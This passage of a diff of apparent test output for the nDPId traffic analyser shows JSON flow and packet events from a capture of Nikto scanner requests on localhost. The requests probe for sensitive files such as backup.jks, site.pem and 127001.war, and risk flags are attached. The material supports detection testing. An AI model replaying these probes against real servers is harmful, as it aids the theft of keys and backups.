-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277010,"flow_last_seen":1576420277010,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49980,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277010,"flow_last_seen":1576420277010,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49980,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277011,"flow_last_seen":1576420277011,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277011,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1576420277011,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1576420277011,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/sClAAEAGjA1\/AAABfwAAAcM+H5BuqIhDc4THFIAYAED+swAAAQEICp1m\/DudZvw7R0VUIC8xMjcuemlwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277011,"flow_last_seen":1576420277011,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277011,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49982,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277011,"flow_last_seen":1576420277011,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277011,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49982,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277013,"flow_last_seen":1576420277013,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277013,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1576420277013,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1576420277013,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/xzVAAEAGdQF\/AAABfwAAAcNAH5BZGv9XO\/ACDYAYAED+swAAAQEICp1m\/D2dZvw9R0VUIC8xMjcuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277013,"flow_last_seen":1576420277013,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277013,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277013,"flow_last_seen":1576420277013,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277013,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277014,"flow_last_seen":1576420277014,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1576420277014,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277014,"pkt":"AAAAAAAAAAAAAAAACABFAADAIeRAAEAGGlJ\/AAABfwAAAcNCH5DPShmIhuR59oAYAED+tAAAAQEICp1m\/D6dZvw+R0VUIC9zaXRlLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277014,"flow_last_seen":1576420277014,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49986,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277014,"flow_last_seen":1576420277014,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49986,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277016,"flow_last_seen":1576420277016,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277016,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1576420277016,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277016,"pkt":"AAAAAAAAAAAAAAAACABFAADA415AAEAGWNd\/AAABfwAAAcNEH5AFlNs7Kigy04AYAED+tAAAAQEICp1m\/ECdZvxAR0VUIC9zaXRlLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277016,"flow_last_seen":1576420277016,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277016,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49988,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277016,"flow_last_seen":1576420277016,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277016,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49988,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277017,"flow_last_seen":1576420277017,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277017,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1576420277017,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277017,"pkt":"AAAAAAAAAAAAAAAACABFAADConZAAEAGmb1\/AAABfwAAAcNGH5DVgZoTcsiCOoAYAED+tgAAAQEICp1m\/EGdZvxBR0VUIC8xMjcwMDEud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277017,"flow_last_seen":1576420277017,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277017,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49990,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277017,"flow_last_seen":1576420277017,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277017,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49990,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277019,"flow_last_seen":1576420277019,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277019,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1576420277019,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277019,"pkt":"AAAAAAAAAAAAAAAACABFAADCTHZAAEAG771\/AAABfwAAAcNIH5DfPnQTJOA0c4AYAED+tgAAAQEICp1m\/EKdZvxCR0VUIC8xMjcwMDEud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277019,"flow_last_seen":1576420277019,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277019,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49992,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277019,"flow_last_seen":1576420277019,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277019,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49992,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277020,"flow_last_seen":1576420277020,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277020,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1576420277020,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277020,"pkt":"AAAAAAAAAAAAAAAACABFAADCeAVAAEAGxC5\/AAABfwAAAcNKH5DAxUBlVYOEbYAYAED+tgAAAQEICp1m\/ESdZvxER0VUIC8xMjcwMDEuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277020,"flow_last_seen":1576420277020,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277020,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49994,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277020,"flow_last_seen":1576420277020,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277020,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49994,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277021,"flow_last_seen":1576420277021,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277021,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1576420277021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277021,"pkt":"AAAAAAAAAAAAAAAACABFAADC3f5AAEAGXjV\/AAABfwAAAcNMH5AeDOWcmsl5CIAYAED+tgAAAQEICp1m\/EWdZvxFR0VUIC8xMjcwMDEuZWdnIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277021,"flow_last_seen":1576420277021,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277021,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49996,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) 